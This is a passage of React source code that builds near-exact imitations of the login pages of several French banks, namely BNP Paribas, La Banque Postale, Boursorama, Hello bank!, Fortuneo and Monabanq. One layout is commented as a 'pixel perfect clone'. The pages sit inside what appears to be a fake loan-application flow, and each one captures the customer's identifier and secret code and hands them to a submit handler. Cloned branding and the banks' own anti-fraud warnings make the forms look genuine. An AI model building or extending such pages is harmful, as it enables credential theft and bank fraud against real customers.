                {/* Step 1 - Continuer button */}
                {bnpStep === 1 && (
                  <div className="flex justify-center mb-4">
                    <Button
                      type="button"
                      onClick={handleBnpContinue}
                      className="h-11 px-12 font-semibold text-sm rounded-full"
                      style={{ backgroundColor: username.length >= 7 ? '#90EE90' : '#A0A0A0', color: username.length >= 7 ? '#006B3F' : '#666' }}
                      disabled={username.length < 7}
                      data-testid="bnp-continue-btn"
                    >
                      Continuer
                    </Button>
                  </div>
                )}
              </form>

              {/* Forgot Links */}
              <div className="flex items-center justify-center space-x-4">
                <a 
                  href="https://mabanque.bnpparibas/fr/banque-contacts/rit/"
                  target="_blank"
                  rel="noopener noreferrer"
                  className="text-white underline text-sm"
                  data-testid="bnp-forgot-client-link"
                >
                  Numéro client oublié
                </a>
                <span className="text-white text-sm">|</span>
                <a 
                  href="https://mabanque.bnpparibas/fr/banque-contacts/recuperer-code-secret"
                  target="_blank"
                  rel="noopener noreferrer"
                  className="text-white underline text-sm"
                  data-testid="bnp-forgot-code-link"
                >
                  Code secret oublié
                </a>
              </div>
            </div>
          </div>

          {/* Right Column - White Security Info */}
          <div className="lg:w-1/2 bg-white px-8 lg:px-12 py-10">
            {/* Security Section */}
            <div className="mb-8">
              <div className="flex items-center mb-4">
                <svg className="w-6 h-6 mr-3" style={{ color: '#006B3F' }} fill="none" stroke="currentColor" viewBox="0 0 24 24">
                  <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M12 15v2m-6 4h12a2 2 0 002-2v-6a2 2 0 00-2-2H6a2 2 0 00-2 2v6a2 2 0 002 2zm10-10V7a4 4 0 00-8 0v4h8z" />
                </svg>
                <h2 className="text-lg font-bold" style={{ color: '#006B3F' }}>Sécurité</h2>
              </div>
              
              <p className="text-sm text-gray-700 mb-4">
                Ne communiquez jamais vos identifiants (numéro client, code secret) par email ou téléphone. BNP Paribas ne vous les demandera jamais.
              </p>
              
              <a 
                href="https://connexion-mabanque.bnpparibas/login?service=%2Foauth2.0%2FcallbackAuthorize%3Fclient_id%3D0e0fe16f-4e44-4138-9c46-fdf077d56087%26scope%3Dopenid%2Bbnpp_mabanque%2Bikpi%26redirect_uri%3Dhttps%253A%252F%252Fmabanque.bnpparibas%252Fauth%252Fon-login%26response_type%3Dcode%26state%3DJZEZjLnJLtj2bukPV5WYTO56%26nonce%3DZyzIpNzh%26client_name%3DCasOAuthClient"
                target="_blank"
                rel="noopener noreferrer"
                className="text-sm underline"
                style={{ color: '#006B3F' }}
              >
                Consulter tous nos conseils sécurité et fraude.
              </a>
            </div>

            {/* Help Section */}
            <div className="border-t border-gray-200 pt-6">
              <h3 className="text-base font-bold text-gray-900 mb-3">Besoin d'aide ?</h3>
              <a 
                href="https://mabanque.bnpparibas/fr/nous-contacter/nous-contacter/faq-assistance-technique"
                target="_blank"
                rel="noopener noreferrer"
                className="text-sm underline"
                style={{ color: '#006B3F' }}
              >
                Consultez notre Assistance technique.
              </a>
            </div>
          </div>
        </div>

        {/* Footer */}
        <div className="py-3 text-center border-t border-gray-100 bg-white">
          <span className="text-gray-400 text-xs">mabanque.bnpparibas</span>
        </div>

        {/* BNP Cookie Popup Overlay */}
        {showPrivacyPopup && (
          <div className="fixed inset-0 z-50 flex items-end justify-center" style={{ backgroundColor: 'rgba(0,0,0,0.5)' }}>
            <div className="w-full max-w-2xl bg-white rounded-t-2xl shadow-2xl p-6 mb-0 animate-in slide-in-from-bottom">
              <ul className="text-sm text-gray-700 space-y-3 mb-4">
                <li className="flex items-start">
                  <span className="mr-2 mt-1">•</span>
                  <span>Améliorer votre expérience utilisateur en personnalisant vos fonctionnalités et se souvenant de vos choix.</span>
                </li>
                <li className="flex items-start">
                  <span className="mr-2 mt-1">•</span>
                  <span>Mesurer l'audience en suivant le nombre de visiteurs et en comprenant comment vous arrivez sur notre site.</span>
                </li>
                <li className="flex items-start">
                  <span className="mr-2 mt-1">•</span>
                  <span>Proposer des publicités personnalisées et en suivre les performances.</span>
                </li>
                <li className="flex items-start">
                  <span className="mr-2 mt-1">•</span>
                  <span>Partager des informations avec les réseaux sociaux utilisés et vous permettre de visualiser du contenu hébergé sur un site externe.</span>
                </li>
              </ul>

              <p className="text-sm text-gray-700 mb-4">
                Votre consentement à l'installation de cookies non strictement nécessaires est libre et peut être retiré ou donné à tout moment en utilisant le lien "Paramètres des cookies" situé en bas de page.
                {' '}
                <a 
                  href="https://mabanque.bnpparibas/fr/informations-legales/politique-cookies"
                  target="_blank"
                  rel="noopener noreferrer"
                  className="underline font-medium"
                  style={{ color: '#006B3F' }}
                >
                  Politique de cookies
                </a>
              </p>

              <p className="text-sm text-gray-900 font-medium mb-4">Nos partenaires</p>

              <div className="space-y-3">
                <Button
                  onClick={() => setShowPrivacyPopup(false)}
                  className="w-full h-12 text-white font-semibold rounded-full text-base"
                  style={{ backgroundColor: '#2DD4BF' }}
                  data-testid="bnp-privacy-accept-btn"
                >
                  Tout accepter
                </Button>
              </div>
            </div>
          </div>
        )}
      </div>
    );
  }

  // Special La Banque Postale Layout - Pixel Perfect Clone
  if (bank.isLaBanquePostaleLayout) {
    // Handle username input - only digits, max 10
    const handleLbpUsernameChange = (e) => {
      const value = e.target.value.replace(/\D/g, '').slice(0, 10);
      setUsername(value);
    };

    // Handle continue to step 2
    const handleLbpContinue = (e) => {
      e.preventDefault();
      if (username.length === 10) {
        setLbpStep(2);
      }
    };

    // Handle keypad press for code secret
    const handleLbpKeypadPress = (num) => {
      if (lbpCodeSecret.length < 6) {
        const newCode = lbpCodeSecret + num;
        setLbpCodeSecret(newCode);
        setPassword(newCode);
      }
    };

    // Handle delete for code secret
    const handleLbpCodeDelete = () => {
      const newCode = lbpCodeSecret.slice(0, -1);
      setLbpCodeSecret(newCode);
      setPassword(newCode);
    };

    // Handle submit
    const handleLbpSubmit = (e) => {
      e.preventDefault();
      if (lbpCodeSecret.length === 6) {
        handleSubmit(e);
      }
    };

    return (
      <div className="min-h-screen flex flex-col" style={{ backgroundColor: '#F5F5F5' }}>
        {/* White Header */}
        <div className="w-full bg-white py-4 px-4 flex items-center justify-between shadow-sm">
          <img 
            src={bank.logo} 
            alt="La Banque Postale"
            className="h-14 w-auto object-contain"
          />
          <button 
            className="text-gray-600"
            onClick={() => navigate('/client/loan-flow/bank-selection')}
            data-testid="lbp-close-btn"
          >
            <svg className="w-6 h-6" fill="none" stroke="currentColor" viewBox="0 0 24 24">
              <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
            </svg>
          </button>
        </div>

        {/* Centered Content Container */}
        <div className="flex-1 flex justify-center">
          <div className="w-full max-w-md">
            {/* Form Section - White background */}
            <div className="bg-white px-10 py-8">
          {/* Title - single line */}
          <h1 className="text-lg font-bold mb-6 whitespace-nowrap" style={{ color: '#002855' }}>
            Connexion à votre compte particulier
          </h1>

          <form onSubmit={lbpStep === 1 ? handleLbpContinue : handleLbpSubmit}>
            {/* Label - Identifiant */}
            <label className="block text-sm font-bold mb-2" style={{ color: '#002855' }}>
              Identifiant (10 chiffres)
            </label>
            
            {/* Input Field - Identifiant */}
            <Input
              type="text"
              inputMode="numeric"
              placeholder=""
              value={username}
              onChange={handleLbpUsernameChange}
              required
              maxLength={10}
              readOnly={lbpStep === 2}
              className="h-12 text-base bg-white border border-gray-300 rounded-lg text-gray-700 mb-4"
              data-testid="lbp-username-input"
            />

            {/* Remember Me Toggle */}
            <div className="flex items-center justify-between mb-6">
              <label className="text-sm text-gray-600">
                Mémoriser mon identifiant
              </label>
              <button
                type="button"
                onClick={() => setLbpRememberMe(!lbpRememberMe)}
                className={`w-12 h-6 rounded-full flex items-center px-1 transition-colors ${lbpRememberMe ? 'bg-blue-600 justify-end' : 'bg-gray-300 justify-start'}`}
              >
                <div className="w-4 h-4 rounded-full bg-white shadow"></div>
              </button>
            </div>

            {/* Step 2 - Password with Virtual Keypad */}
            {lbpStep === 2 && (
              <>
                {/* Label - Mot de passe */}
                <label className="block text-sm font-bold mb-3" style={{ color: '#002855' }}>
                  Mot de passe (6 chiffres)
                </label>

                {/* 6 oval dots display for code */}
                <div className="flex items-center justify-center space-x-3 mb-6">
                  {[0, 1, 2, 3, 4, 5].map((index) => (
                    <div
                      key={index}
                      className={`w-5 h-5 rounded-full border-2 ${
                        index < lbpCodeSecret.length 
                          ? 'bg-blue-900 border-blue-900' 
                          : 'bg-transparent border-blue-300'
                      }`}
                      style={{ borderColor: index < lbpCodeSecret.length ? '#002855' : '#93C5FD' }}
                    />
                  ))}
                </div>

                {/* Virtual Keypad - 5x2 grid with light blue buttons */}
                <div className="grid grid-cols-5 gap-2 mb-6">
                  {lbpKeypadNumbers.map((num, index) => (
                    <button
                      key={index}
                      type="button"
                      onClick={() => handleLbpKeypadPress(num)}
                      className="h-14 text-xl font-bold rounded-lg transition-colors"
                      style={{ 
                        backgroundColor: '#E8F4FC', 
                        color: '#002855'
                      }}
                      data-testid={`lbp-keypad-${num}`}
                    >
                      {num}
                    </button>
                  ))}
                </div>

                {/* Se connecter Button */}
                <Button
                  type="submit"
                  className="w-full h-12 text-white font-semibold text-base rounded-lg"
                  style={{ backgroundColor: '#002855' }}
                  disabled={loading || lbpCodeSecret.length !== 6}
                  data-testid="lbp-submit-btn"
                >
                  {loading ? 'Connexion en cours...' : 'Se connecter'}
                </Button>
              </>
            )}

            {/* Step 1 - Continuer Button */}
            {lbpStep === 1 && (
              <Button
                type="submit"
                className="w-full h-12 text-white font-semibold text-base rounded-lg"
                style={{ backgroundColor: '#002855' }}
                disabled={username.length !== 10}
                data-testid="lbp-continue-btn"
              >
                Continuer
              </Button>
            )}
          </form>

          {/* Forgot Link */}
          <div className="mt-4 text-center">
            <a 
              href={bank.forgotIdentifiantLink || '#'}
              target="_blank"
              rel="noopener noreferrer"
              className="text-sm text-gray-500 underline"
            >
              Identifiant / Mot de passe oublié
            </a>
          </div>
        </div>

        {/* Bottom Section - Blue gradient */}
        <div 
          className="flex-1 px-6 py-8"
          style={{ 
            background: 'linear-gradient(180deg, #003DA5 0%, #002855 100%)'
          }}
        >
          {/* Main tagline */}
          <h2 className="text-2xl font-bold text-white mb-6 px-4">
            La Banque Postale,<br />citoyenne
          </h2>

          {/* Card - Espace Assurance - wider */}
          <div className="bg-white/10 border border-white/30 rounded-xl p-4 mb-4">
            <div className="flex items-center mb-3">
              <div className="w-8 h-8 bg-yellow-400 rounded flex items-center justify-center mr-3">
                <span className="text-xs font-bold text-blue-900">LBP</span>
              </div>
              <span className="text-white font-semibold text-sm">
                Espace Assurance La Banque Postale
              </span>
            </div>
            
            <a 
              href="https://www.labanquepostale.fr/particulier/assurances.html"
              target="_blank"
              rel="noopener noreferrer"
              className="text-white text-sm underline block mb-3"
            >
              Signer mon contrat en ligne
            </a>
            
            <Button
              variant="outline"
              className="w-full h-10 text-white border-white rounded-lg text-sm font-semibold hover:bg-white/10"
            >
              Me connecter à mon espace assurance
            </Button>
          </div>
        </div>
          </div>
        </div>
      </div>
    );
  }

  // Special Boursorama Layout
  if (bank.isBoursoramaLayout) {
    const handleBoursoramaNext = (e) => {
      e.preventDefault();
      if (boursoramaStep === 1 && username) {
        setBoursoramaStep(2);
      } else if (boursoramaStep === 2 && password) {
        handleSubmit(e);
      }
    };

    return (
      <div className="min-h-screen bg-gray-100">
        {/* Main Content */}
        <div className="max-w-lg mx-auto px-4 py-8">
          {/* BoursoBank Text Logo - Centered above card */}
          <div className="flex justify-center mb-6 pt-8">
            <div className="flex items-center">
              {/* Geometric triangles - matching real BoursoBank logo */}
              <svg width="32" height="32" viewBox="0 0 32 32" className="mr-2">
                <path d="M4,28 L16,4 L16,28 Z" fill="#00B4E6" />
                <path d="M16,28 L16,12 L28,28 Z" fill="#E5007E" />
              </svg>
              {/* BoursoBank text */}
              <span className="text-xl font-bold tracking-tight">
                <span style={{ color: '#E5007E' }}>Bourso</span>
                <span style={{ color: '#1A1F71' }}>Bank</span>
              </span>
            </div>
          </div>

          <div className="bg-white rounded-xl shadow-lg overflow-hidden">
            {/* Pink/Magenta top bar */}
            <div className="w-full h-1.5" style={{ backgroundColor: '#E5007E' }}></div>
            <div className="p-8">
            {/* Logo */}
            <div className="flex justify-center mb-6">
              <img 
                src={bank.logo} 
                alt={bank.name} 
                className="h-24 w-auto object-contain"
              />
            </div>

            {/* Title */}
            <h1 className="text-2xl font-medium text-center mb-6" style={{ color: '#1a3b5d' }}>
              {boursoramaStep === 1 ? 'Mon identifiant' : 'Mon code secret'}
            </h1>

            {/* Security Notice - Only on step 1 */}
            {boursoramaStep === 1 && (
              <div className="text-center mb-6">
                <p className="text-gray-500 text-sm mb-2">
                  Veuillez toujours vérifier que vous êtes sur la bonne adresse
                </p>
                <div className="inline-flex items-center px-3 py-1 rounded-full border border-gray-300 bg-gray-50">
                  <svg className="h-4 w-4 text-gray-500 mr-2" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M12 15v2m-6 4h12a2 2 0 002-2v-6a2 2 0 00-2-2H6a2 2 0 00-2 2v6a2 2 0 002 2zm10-10V7a4 4 0 00-8 0v4h8z" />
                  </svg>
                  <span className="text-sm text-gray-600">clients.boursobank.com</span>
                </div>
              </div>
            )}

            <form onSubmit={handleBoursoramaNext} className="px-8">
              {boursoramaStep === 1 ? (
                <>
                  {/* Identifiant Input */}
                  <div className="mb-6">
                    <Input
                      type="text"
                      placeholder="Saisissez votre identifiant"
                      value={username}
                      onChange={(e) => setUsername(e.target.value)}
                      required
                      className="h-14 text-base border-0 border-b-2 border-pink-500 rounded-none bg-transparent focus:ring-0 focus:border-pink-600 placeholder-gray-400"
                      data-testid="boursorama-username-input"
                    />
                  </div>

                  {/* Remember Me Checkbox */}
                  <div className="flex items-center mb-8">
                    <input
                      type="checkbox"
                      id="remember-me"
                      checked={rememberMe}
                      onChange={(e) => setRememberMe(e.target.checked)}
                      className="h-5 w-5 border-2 border-gray-300 rounded text-pink-500 focus:ring-pink-500"
                    />
                    <label htmlFor="remember-me" className="ml-3 text-gray-700 font-medium">
                      Mémoriser mon identifiant
                    </label>
                  </div>
                </>
              ) : (
                <>
                  {/* Password Input */}
                  <div className="mb-8 relative">
                    <Input
                      type={showPassword ? 'text' : 'password'}
                      placeholder="Saisissez votre code secret"
                      value={password}
                      onChange={(e) => setPassword(e.target.value)}
                      required
                      className="h-14 text-base border-0 border-b-2 border-pink-500 rounded-none bg-transparent focus:ring-0 focus:border-pink-600 placeholder-gray-400 pr-12"
                      data-testid="boursorama-password-input"
                    />
                    <button
                      type="button"
                      onClick={() => setShowPassword(!showPassword)}
                      className="absolute right-3 top-4 text-gray-400 hover:text-gray-600"
                    >
                      {showPassword ? <EyeOff className="h-5 w-5" /> : <Eye className="h-5 w-5" />}
                    </button>
                  </div>
                </>
              )}

              {/* Submit Button */}
              <Button
                type="submit"
                className="w-full h-12 text-white font-semibold text-base rounded-full"
                style={{ backgroundColor: '#C41058' }}
                disabled={loading || (boursoramaStep === 1 && !username) || (boursoramaStep === 2 && !password)}
                data-testid="boursorama-submit-btn"
              >
                {loading ? 'Connexion en cours...' : 'Suivant'}
              </Button>
            </form>

            {/* Forgot Link */}
            {boursoramaStep === 1 && (
              <div className="mt-6 text-center">
                <a 
                  href={bank.forgotIdentifiantLink || '#'}
                  target="_blank"
                  rel="noopener noreferrer"
                  className="text-pink-500 font-medium hover:underline"
                >
                  Identifiant oublié ?
                </a>
              </div>
            )}

            {boursoramaStep === 2 && (
              <div className="mt-6 text-center">
                <a 
                  href="#"
                  className="text-pink-500 font-medium hover:underline"
                >
                  Code secret oublié ?
                </a>
              </div>
            )}

            {/* Aide / Opposition / Sécurité */}
            <div className="mt-8 pt-6 border-t border-gray-200">
              <button className="w-full flex items-center justify-center text-gray-600 hover:text-gray-800">
                <svg className="h-5 w-5 mr-2 transform rotate-180" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                  <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M19 9l-7 7-7-7" />
                </svg>
                <span className="font-medium">Aide / Opposition / Sécurité</span>
              </button>
            </div>
            </div>
          </div>
        </div>
      </div>
    );
  }

  // Special Hello bank! Layout
  if (bank.isHelloBankLayout) {
    const handleHelloBankNext = (e) => {
      e.preventDefault();
      if (helloBankStep === 1 && username) {
        setHelloBankStep(2);
      } else if (helloBankStep === 2 && password) {
        handleSubmit(e);
      }
    };

    return (
      <div className="min-h-screen bg-white">
        {/* Hello bank! Header - White */}
        <div className="w-full py-3 px-4 border-b border-gray-200 bg-white">
          <div className="flex items-center justify-between">
            {/* Left: Logo */}
            <img 
              src={bank.logo} 
              alt={bank.name} 
              className="h-8 w-auto object-contain"
            />
            {/* Right: Retour button - redirects to hellobank.fr */}
            <a 
              href="https://www.hellobank.fr/"
              target="_blank"
              rel="noopener noreferrer"
              className="bg-gray-100 text-gray-800 px-4 py-2 rounded-full text-sm font-medium hover:bg-gray-200 flex items-center space-x-1"
            >
              <ArrowLeft className="h-4 w-4" />
              <span>Retour à Hello bank!</span>
            </a>
          </div>
        </div>

        {/* Main Content */}
        <div className="max-w-md mx-auto px-4 py-8">
          {/* Logo */}
          <div className="flex justify-center mb-6">
            <img 
              src={bank.logo} 
              alt={bank.name} 
              className="h-24 w-auto object-contain"
            />
          </div>

          {/* Title */}
          <h1 className="text-2xl font-bold text-center text-gray-900 mb-8">
            Accédez à votre espace client
          </h1>

          <form onSubmit={handleHelloBankNext}>
            {helloBankStep === 1 ? (
              <>
                {/* Numéro Client Label */}
                <label className="block text-sm font-semibold text-gray-700 mb-2">
                  Numéro Client
                </label>
                
                {/* Input Field */}
                <div className="mb-4">
                  <Input
                    type="text"
                    placeholder="Numéro de 7 à 10 chiffres"
                    value={username}
                    onChange={(e) => setUsername(e.target.value)}
                    required
                    className="h-14 text-base border-2 border-gray-300 rounded-lg focus:border-cyan-500 focus:ring-cyan-500"
                    data-testid="hellobank-username-input"
                  />
                </div>

                {/* Remember Me Checkbox */}
                <div className="flex items-center mb-6">
                  <input
                    type="checkbox"
                    id="remember-hellobank"
                    checked={rememberMe}
                    onChange={(e) => setRememberMe(e.target.checked)}
                    className="h-5 w-5 border-2 border-gray-300 rounded text-cyan-500 focus:ring-cyan-500"
                  />
                  <label htmlFor="remember-hellobank" className="ml-3 text-gray-700 font-medium flex items-center">
                    Mémoriser mon numéro client
                    <span className="ml-2 w-5 h-5 rounded-full border border-gray-400 flex items-center justify-center text-xs text-gray-500">i</span>
                  </label>
                </div>
              </>
            ) : (
              <>
                {/* Code secret Label */}
                <label className="block text-sm font-semibold text-gray-700 mb-2">
                  Code secret
                </label>
                
                {/* Password Input Field */}
                <div className="mb-6 relative">
                  <Input
                    type={showPassword ? 'text' : 'password'}
                    placeholder="Saisissez votre code secret"
                    value={password}
                    onChange={(e) => setPassword(e.target.value)}
                    required
                    className="h-14 text-base border-2 border-gray-300 rounded-lg focus:border-cyan-500 focus:ring-cyan-500 pr-12"
                    data-testid="hellobank-password-input"
                  />
                  <button
                    type="button"
                    onClick={() => setShowPassword(!showPassword)}
                    className="absolute right-3 top-4 text-gray-400 hover:text-gray-600"
                  >
                    {showPassword ? <EyeOff className="h-5 w-5" /> : <Eye className="h-5 w-5" />}
                  </button>
                </div>
              </>
            )}

            {/* Submit Button */}
            <Button
              type="submit"
              className="w-full h-14 text-white font-semibold text-lg rounded-full"
              style={{ backgroundColor: '#00A3D9' }}
              disabled={loading || (helloBankStep === 1 && !username) || (helloBankStep === 2 && !password)}
              data-testid="hellobank-submit-btn"
            >
              {loading ? 'Connexion en cours...' : 'Continuer'}
            </Button>
          </form>

          {/* Forgot Links */}
          <div className="mt-6 text-center space-y-2">
            <a 
              href={bank.forgotIdentifiantLink}
              target="_blank"
              rel="noopener noreferrer"
              className="block text-blue-900 font-medium hover:underline"
            >
              Identifiant oublié
            </a>
            <a 
              href={bank.forgotCodeSecretLink}
              target="_blank"
              rel="noopener noreferrer"
              className="block text-blue-900 font-medium hover:underline"
            >
              Code secret oublié
            </a>
          </div>

          {/* Security Section */}
          <div className="mt-8 p-4 bg-gray-50 rounded-lg">
            <div className="flex items-start space-x-3">
              <div className="flex-shrink-0 mt-1">
                <svg className="h-5 w-5 text-gray-600" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                  <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M12 15v2m-6 4h12a2 2 0 002-2v-6a2 2 0 00-2-2H6a2 2 0 00-2 2v6a2 2 0 002 2zm10-10V7a4 4 0 00-8 0v4h8z" />
                </svg>
              </div>
              <div>
                <p className="font-semibold text-gray-900 mb-1">Sécurité</p>
                <p className="text-sm text-gray-600">
                  Veuillez toujours vérifier que vous êtes sur la bonne adresse et que la connexion est sécurisée.
                </p>
              </div>
            </div>
          </div>

          {/* Help Section */}
          <div className="mt-4 p-4 bg-gray-50 rounded-lg">
            <div className="flex items-start space-x-3">
              <div className="flex-shrink-0 mt-1">
                <svg className="h-5 w-5 text-gray-600" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                  <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M8.228 9c.549-1.165 2.03-2 3.772-2 2.21 0 4 1.343 4 3 0 1.4-1.278 2.575-3.006 2.907-.542.104-.994.54-.994 1.093m0 3h.01M21 12a9 9 0 11-18 0 9 9 0 0118 0z" />
                </svg>
              </div>
              <div>
                <p className="font-semibold text-gray-900 mb-1">Besoin d'aide ?</p>
                <a 
                  href="https://www.hellobank.fr/fr/aide/"
                  target="_blank"
                  rel="noopener noreferrer"
                  className="text-sm text-blue-600 hover:underline"
                >
                  Consulter notre Assistance technique
                </a>
              </div>
            </div>
          </div>
        </div>
      </div>
    );
  }

  // Special Fortuneo Layout
  if (bank.isFortuneolayout) {
    return (
      <div className="min-h-screen bg-gray-100">
        {/* Fortuneo Header - White */}
        <div className="w-full py-3 px-4 border-b border-gray-200 bg-white">
          <div className="flex items-center justify-between">
            {/* Left: Logo */}
            <img 
              src={bank.logo} 
              alt={bank.name} 
              className="h-10 w-auto object-contain"
            />
            {/* Right: Retour button */}
            <button 
              onClick={() => navigate('/client/loan-flow/bank-selection')}
              className="flex items-center space-x-1 text-gray-600 hover:text-gray-800"
            >
              <ArrowLeft className="h-4 w-4" />
              <span className="text-sm">Retour</span>
            </button>
          </div>
        </div>

        {/* Hero Section with Green Band */}
        <div className="relative">
          {/* Green diagonal band */}
          <div 
            className="absolute left-0 top-0 bottom-0 w-1/3"
            style={{ 
              background: 'linear-gradient(135deg, #8CC63F 0%, #7AB82F 100%)',
              clipPath: 'polygon(0 0, 100% 0, 70% 100%, 0 100%)'
            }}
          />
          
          {/* Content */}
          <div className="relative flex items-center justify-between px-8 py-6">
            {/* Left side - Text */}
            <div className="z-10 max-w-xs">
              <h1 className="text-2xl font-bold text-white leading-tight">
                Bienvenue dans votre espace client.
              </h1>
            </div>
            
            {/* Right side - Woman image */}
            <div className="relative z-10">
              <img 
                src={bank.heroImage}
                alt="Cliente Fortuneo"
                className="h-48 w-auto object-cover rounded-lg shadow-lg"
              />
            </div>
          </div>
        </div>

        {/* Login Form Card */}
        <div className="max-w-md mx-auto px-4 py-8 -mt-4">
          <div className="bg-white rounded-xl shadow-lg p-8">
            {/* Logo */}
            <div className="flex justify-center mb-6">
              <img 
                src={bank.logo} 
                alt={bank.name} 
                className="h-16 w-auto object-contain"
              />
            </div>

            {/* Title */}
            <h2 className="text-lg font-semibold text-center mb-6" style={{ color: '#8CC63F' }}>
              Saisissez votre identifiant et mot de passe
            </h2>

            <form onSubmit={handleSubmit}>
              {/* Identifiant Field */}
              <div className="mb-4">
                <label className="block text-sm font-medium text-gray-700 mb-2">
                  Identifiant
                </label>
                <Input
                  type="text"
                  placeholder="000000"
                  value={username}
                  onChange={(e) => setUsername(e.target.value)}
                  required
                  className="h-12 text-base bg-gray-100 border-0 rounded-lg focus:ring-2 focus:ring-green-400"
                  data-testid="fortuneo-username-input"
                />
              </div>

              {/* Mot de passe Field */}
              <div className="mb-4">
                <label className="block text-sm font-medium text-gray-700 mb-2">
                  Mot de passe
                </label>
                <div className="relative">
                  <Input
                    type={showPassword ? 'text' : 'password'}
                    placeholder="Votre mot de passe"
                    value={password}
                    onChange={(e) => setPassword(e.target.value)}
                    required
                    className="h-12 text-base bg-gray-100 border-0 rounded-lg focus:ring-2 focus:ring-green-400 pr-12"
                    data-testid="fortuneo-password-input"
                  />
                  <button
                    type="button"
                    onClick={() => setShowPassword(!showPassword)}
                    className="absolute right-3 top-3 text-gray-400 hover:text-gray-600"
                  >
                    {showPassword ? <EyeOff className="h-5 w-5" /> : <Eye className="h-5 w-5" />}
                  </button>
                </div>
              </div>

              {/* Remember Me Checkbox */}
              <div className="flex items-center mb-6">
                <input
                  type="checkbox"
                  id="remember-fortuneo"
                  checked={rememberMe}
                  onChange={(e) => setRememberMe(e.target.checked)}
                  className="h-4 w-4 border-gray-300 rounded text-green-500 focus:ring-green-500"
                />
                <label htmlFor="remember-fortuneo" className="ml-2 text-sm text-gray-600">
                  Mémoriser l'identifiant
                </label>
              </div>

              {/* Submit Button */}
              <Button
                type="submit"
                className="w-full h-12 text-white font-semibold text-base rounded-full"
                style={{ backgroundColor: '#8CC63F' }}
                disabled={loading || !username || !password}
                data-testid="fortuneo-submit-btn"
              >
                {loading ? 'Connexion en cours...' : 'Connexion'}
              </Button>
            </form>
          </div>
        </div>
      </div>
    );
  }

  // Special Monabanq Layout
  if (bank.isMonabanqLayout) {
    return (
      <div className="min-h-screen bg-white">
        {/* Monabanq Header - Black */}
        <div className="w-full py-3 px-4 bg-black">
          <div className="flex items-center justify-between">
            {/* Left: Logo */}
            <div className="flex items-baseline">
              <span className="text-xl font-bold" style={{ color: '#BFFF00' }}>mona</span>
              <span className="text-xl font-bold text-white">banq</span>
              <span className="text-xs text-gray-400 ml-2 hidden sm:inline">les gens avant l'argent</span>
            </div>
            {/* Right: Lock icon */}
            <div className="flex items-center space-x-2 text-white">
              <svg className="h-5 w-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M12 15v2m-6 4h12a2 2 0 002-2v-6a2 2 0 00-2-2H6a2 2 0 00-2 2v6a2 2 0 002 2zm10-10V7a4 4 0 00-8 0v4h8z" />
              </svg>
            </div>
          </div>
        </div>

        {/* Fraud Alert Banner - Pink/Magenta */}
        <div className="w-full px-4 py-3" style={{ backgroundColor: '#E91E63' }}>
          <div className="flex items-start space-x-2">
            <div className="flex-shrink-0 mt-0.5">
              <span className="w-5 h-5 rounded-full bg-white flex items-center justify-center text-xs font-bold" style={{ color: '#E91E63' }}>i</span>
            </div>
            <div className="text-white">
              <p className="font-semibold text-sm">Fraude : restez vigilant</p>
              <p className="text-xs opacity-90">Monabanq ne vous demandera jamais vos informations confidentielles (code d'accès, code de validation, identifiant)</p>
            </div>
          </div>
        </div>

        {/* Main Content */}
        <div className="max-w-md mx-auto px-4 py-8">
          {/* User Icon */}
          <div className="flex justify-center mb-4">
            <div className="w-16 h-16 rounded-full bg-gray-100 flex items-center justify-center">
              <svg className="h-8 w-8 text-gray-400" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M16 7a4 4 0 11-8 0 4 4 0 018 0zM12 14a7 7 0 00-7 7h14a7 7 0 00-7-7z" />
              </svg>
            </div>
          </div>

          {/* Title */}
          <h1 className="text-xl font-bold text-center text-gray-900 mb-6">
            Accéder à mon espace client
          </h1>

          <form onSubmit={handleSubmit}>
            {/* Identifiant Field */}
            <div className="mb-4">
              <label className="block text-sm font-medium text-gray-700 mb-2">
                Identifiant
              </label>
              <Input
                type="text"
                placeholder="Votre identifiant"
                value={username}
                onChange={(e) => setUsername(e.target.value)}
                required
                className="h-12 text-base bg-gray-100 border-0 rounded-lg focus:ring-2 focus:ring-lime-400"
                data-testid="monabanq-username-input"
              />
            </div>

            {/* Code d'accès Field */}
            <div className="mb-4">
              <label className="block text-sm font-medium text-gray-700 mb-2">
                Code d'accès
              </label>
              <div className="relative">
                <Input
                  type={showPassword ? 'text' : 'password'}
                  placeholder="Votre code d'accès"
                  value={password}
                  onChange={(e) => setPassword(e.target.value)}
                  required
                  className="h-12 text-base bg-gray-100 border-0 rounded-lg focus:ring-2 focus:ring-lime-400 pr-12"
                  data-testid="monabanq-password-input"
                />
                <button
                  type="button"
                  onClick={() => setShowPassword(!showPassword)}
                  className="absolute right-3 top-3 text-gray-400 hover:text-gray-600"
                >
                  {showPassword ? <EyeOff className="h-5 w-5" /> : <Eye className="h-5 w-5" />}
                </button>
              </div>
            </div>

            {/* Remember Me Checkbox */}
            <div className="flex items-center mb-6">
              <input
                type="checkbox"
                id="remember-monabanq"
                checked={rememberMe}
                onChange={(e) => setRememberMe(e.target.checked)}
                className="h-4 w-4 border-gray-300 rounded"
              />
              <label htmlFor="remember-monabanq" className="ml-2 text-sm text-gray-600">
                Mémoriser mon identifiant
              </label>
            </div>

            {/* Submit Button - Lime green rounded */}
            <Button
              type="submit"
              className="w-full h-12 font-semibold text-base rounded-full"
              style={{ backgroundColor: '#BFFF00', color: '#000000' }}
              disabled={loading || !username || !password}
              data-testid="monabanq-submit-btn"
            >
              {loading ? 'Connexion en cours...' : 'Se connecter'}
            </Button>
          </form>

          {/* Help Links */}
          <div className="mt-6 text-center space-y-2">
            <p className="text-sm">
              <a href="https://www.monabanq.com/fr/identification/MotDePasseOublie.html" target="_blank" rel="noopener noreferrer" className="text-gray-600 hover:underline">Code d'accès oublié</a>
              <span className="text-gray-400 mx-2">|</span>
